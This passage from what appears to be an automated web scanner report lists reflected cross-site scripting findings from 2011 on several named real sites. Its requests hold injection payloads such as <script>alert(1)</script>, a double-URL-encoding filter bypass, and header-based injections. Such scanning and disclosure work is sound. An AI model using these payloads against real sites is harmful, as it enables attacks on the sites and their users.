The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f48c2'%3b6f5ee646a27 was submitted in the REST URL parameter 2. This input was echoed as f48c2';6f5ee646a27 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeContent.aspxf48c2'%3b6f5ee646a27?id=694&ticks=810228 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56151
Vary: Accept-Encoding
Cache-Control: public, max-age=562
Expires: Fri, 01 Apr 2011 18:20:02 GMT
Date: Fri, 01 Apr 2011 18:10:40 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeContent.aspxf48c2';6f5ee646a27/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.104. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b61d'%3b29e3180e9f2 was submitted in the REST URL parameter 1. This input was echoed as 9b61d';29e3180e9f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content9b61d'%3b29e3180e9f2/ServeResource.aspx?id=687&ticks=1202993762 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1202993762
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56111
Vary: Accept-Encoding
Cache-Control: public, max-age=561
Expires: Fri, 01 Apr 2011 18:20:02 GMT
Date: Fri, 01 Apr 2011 18:10:41 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content9b61d';29e3180e9f2/ServeResource.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.105. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8609'%3b7b5c8f42fb7 was submitted in the REST URL parameter 2. This input was echoed as d8609';7b5c8f42fb7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeResource.aspxd8609'%3b7b5c8f42fb7?id=687&ticks=1202993762 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1202993762
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:10:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56157
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:20:46 GMT
Date: Fri, 01 Apr 2011 18:10:46 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeResource.aspxd8609';7b5c8f42fb7/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.106. http://www.ny1.com/favicon.ico [80003'-alert(1)-'46fe3f653ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ny1.com
Path:   /favicon.ico

Issue detail

The value of the 80003'-alert(1)-'46fe3f653ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2899d'-alert(1)-'c21f3904534 was submitted in the 80003'-alert(1)-'46fe3f653ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?80003'-alert(1)-'46fe3f653ad=12899d'-alert(1)-'c21f3904534 HTTP/1.1
Host: www.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56138
Vary: Accept-Encoding
Cache-Control: public, max-age=590
Expires: Fri, 01 Apr 2011 18:20:55 GMT
Date: Fri, 01 Apr 2011 18:11:05 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/favicon.ico?80003'-alert(1)-'46fe3f653ad=12899d'-alert(1)-'c21f3904534'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.107. http://www.ny1.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ny1.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f09d'%3b2cbc36dd419 was submitted in the REST URL parameter 1. This input was echoed as 2f09d';2cbc36dd419 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico2f09d'%3b2cbc36dd419 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ny1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 15:47:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56403
Vary: Accept-Encoding
Cache-Control: public, max-age=571
Expires: Fri, 01 Apr 2011 15:57:09 GMT
Date: Fri, 01 Apr 2011 15:47:38 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/favicon.ico2f09d';2cbc36dd419/default.aspx'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.108. http://www.ny1.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ny1.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80003'-alert(1)-'46fe3f653ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?80003'-alert(1)-'46fe3f653ad=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ny1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 15:47:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56353
Vary: Accept-Encoding
Cache-Control: public, max-age=592
Expires: Fri, 01 Apr 2011 15:57:21 GMT
Date: Fri, 01 Apr 2011 15:47:29 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://www.ny1.com:80/favicon.ico?80003'-alert(1)-'46fe3f653ad=1'; var gRegionSelected = '1';//]]>
...[SNIP]...

2.109. http://www.ottawacitizen.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ottawacitizen.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19e72'%3b535a1938ce9 was submitted in the REST URL parameter 1. This input was echoed as 19e72';535a1938ce9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /19e72'%3b535a1938ce9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ottawacitizen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 15:39:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 15:39:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130661


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/ccn.com/19e72';535a1938ce9/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=19e72';535a1938ce9;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93713010?">
...[SNIP]...

2.110. http://www.quickyellow.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quickyellow.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0f13<script>alert(1)</script>b6b93a36579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quickyellow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Date: Fri, 01 Apr 2011 16:32:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.quickyellow.com/favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1
Content-Length: 285
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1><p>You don't have permission to access http://www.quickyellow.com/favicon.ico?c0f13<script>alert(1)</script>b6b93a36579=1
on this server.</p>
...[SNIP]...

2.111. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage1.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 360a1%253cscript%253ealert%25281%2529%253c%252fscript%253efe66127eeb4 was submitted in the REST URL parameter 1. This input was echoed as 360a1<script>alert(1)</script>fe66127eeb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico360a1%253cscript%253ealert%25281%2529%253c%252fscript%253efe66127eeb4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 01 Apr 2011 17:25:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico360a1<script>alert(1)</script>fe66127eeb4<br>
...[SNIP]...

2.112. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage1.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 644d8<script>alert(1)</script>c65e2d87a48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?644d8<script>alert(1)</script>c65e2d87a48=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage1.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Fri, 01 Apr 2011 17:25:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage1.com/spe404.aspx?404;http://www.swiftpage1.com:80/favicon.ico?644d8<script>alert(1)</script>c65e2d87a48=1<br>
...[SNIP]...

2.113. http://www.viagra.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.viagra.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ebdb6'%3b238a37bb66d was submitted in the REST URL parameter 1. This input was echoed as ebdb6';238a37bb66d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icoebdb6'%3b238a37bb66d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viagra.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 17076
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 01 Apr 2011 15:49:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>
       40
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName='http://www.viagra.com/Redirect.aspx?404;http://www.viagra.com:80/favicon.icoebdb6';238a37bb66d';
s.pageType='errorPage';
s.prop1='page error';
s.prop3='error:404';
s.prop5='';
/* Conversion Variables */
s.campaign='';
s.events='7:pageview';
s.eVar3='error:404';
s.eVar5='';
s.eVar6='';
s.eVar18=
...[SNIP]...

2.114. http://www.viagra.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viagra.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92bef'-alert(1)-'af112dd110f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?92bef'-alert(1)-'af112dd110f=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.viagra.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 17089
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 01 Apr 2011 15:49:13 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>
       40
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on the next lines. */
s.pageName='http://www.viagra.com/Redirect.aspx?404;http://www.viagra.com:80/favicon.ico?92bef'-alert(1)-'af112dd110f=1';
s.pageType='errorPage';
s.prop1='page error';
s.prop3='error:404';
s.prop5='';
/* Conversion Variables */
s.campaign='';
s.events='7:pageview';
s.eVar3='error:404';
s.eVar5='';
s.eVar6='';
s.eVar1
...[SNIP]...

2.115. http://community.dogpile.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.dogpile.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f6b4"-alert(1)-"d53f37e00db was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: community.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.168f6b4"-alert(1)-"d53f37e00db
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:01 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 17:12:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Set-Cookie: RescueUserProfile=AnonymousId=54FD7D1F4FCE244B9E8E2E6C78C4AD06; expires=Mon, 29-Mar-2021 17:12:13 GMT; path=/; domain=rescue.dogpile.com
Set-Cookie: RescueSession=ActionId=578B1FBDAF35A73DAC17A778A44C4092&SessionId=B63CD17302B6DFC9486F33ED8B8928F7; expires=Fri, 01-Apr-2011 17:32:13 GMT; path=/; domain=rescue.dogpile.com
Last-Modified: Fri, 1 Apr 2011 17:12:13 GMT
Expires: Fri, 1 Apr 2011 17:12:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Dogpi
...[SNIP]...
<![CDATA[
   var userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.168f6b4"-alert(1)-"d53f37e00db";
   var clientIP = "173.193.214.243";
   // ]]>
...[SNIP]...

2.116. http://support.dogpile.com/pressroom/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.dogpile.com
Path:   /pressroom/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e495"-alert(1)-"9bf1c96b7b6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pressroom/ HTTP/1.1
Host: support.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.163e495"-alert(1)-"9bf1c96b7b6
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:11:01 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 17:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Set-Cookie: RescueUserProfile=AnonymousId=042912B6EF477475A9F8C372FEAD0737; expires=Mon, 29-Mar-2021 17:12:14 GMT; path=/; domain=rescue.dogpile.com
Set-Cookie: RescueSession=ActionId=54FE83B861E3A963BB99A255C9D1979A&SessionId=E801149D4CBCD3E8143E4A98AE2C088E; expires=Fri, 01-Apr-2011 17:32:14 GMT; path=/; domain=rescue.dogpile.com
Last-Modified: Fri, 1 Apr 2011 17:12:15 GMT
Expires: Fri, 1 Apr 2011 17:12:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Do
...[SNIP]...
<![CDATA[
   var userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.163e495"-alert(1)-"9bf1c96b7b6";
   var clientIP = "173.193.214.243";
   // ]]>
...[SNIP]...

2.117. http://www.blacksingles.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blacksingles.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c01b6"%3balert(1)//507cc18a657 was submitted in the Referer HTTP header. This input was echoed as c01b6";alert(1)//507cc18a657 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blacksingles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=c01b6"%3balert(1)//507cc18a657

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 16:32:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: al-amho=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: al-juso=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: SparkUPS=; expires=Thu, 31-Mar-2011 16:32:37 GMT; path=/
Set-Cookie: OmnitureSessionCheck=2011-04-01 09:32:37Z; path=/
Set-Cookie: REG091202=REG091202&prm=55020&ScenarioFile=/Applications/Registration/XML/SplashRegistration_9051.xml&ScenarioName=Scenario 22&LAST_COMPLETED_STEP=0&CURRENT_STEP=1&SESSION_ID=29782a70-8f42-4bb3-a5f5-0c42294bfb13&START_STEP_ID=1; expires=Sun, 01-May-2011 16:32:37 GMT; path=/
